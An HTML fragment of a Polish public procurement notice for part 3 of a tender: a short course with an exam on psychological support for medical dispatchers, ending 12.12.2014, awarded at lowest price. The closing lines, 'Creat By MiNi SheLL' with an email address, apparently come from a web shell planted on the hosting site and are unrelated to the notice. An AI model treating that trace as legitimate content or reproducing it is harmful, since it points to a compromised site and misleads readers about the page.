<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Cześć nr 3 (kurs nr 1 ) - maksymalnie 5 godz..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cześć nr 3 (kurs nr 1 ) - maksymalnie 5 godz. tj.
Przedmiotem zamówienia jest przeprowadzenie zajęć teoretycznych, praktycznych i egzaminu zaliczającego o tematyce: wsparcie psychologiczne dla dyspozytora.

Przedmiot zamówienia należy wykonać w oparciu o opracowane przez siebie treści, zgodne z Programem kursu doskonalącego dla dyspozytorów medycznych w ramach doskonalenia zawodowego - stanowiącego załącznik nr 1B do umowy wykonawczej NR ZP-1092/2/13/UE zawartej w dniu 11.12.2013r. w Warszawie z projektu systemowego pn.: Wsparcie systemu ratownictwa medycznego poprzez kształcenie zawodowe lekarzy, ratowników medycznych i dyspozytorów medycznych współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego stanowiącym Załącznik nr 10 do niniejszej SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com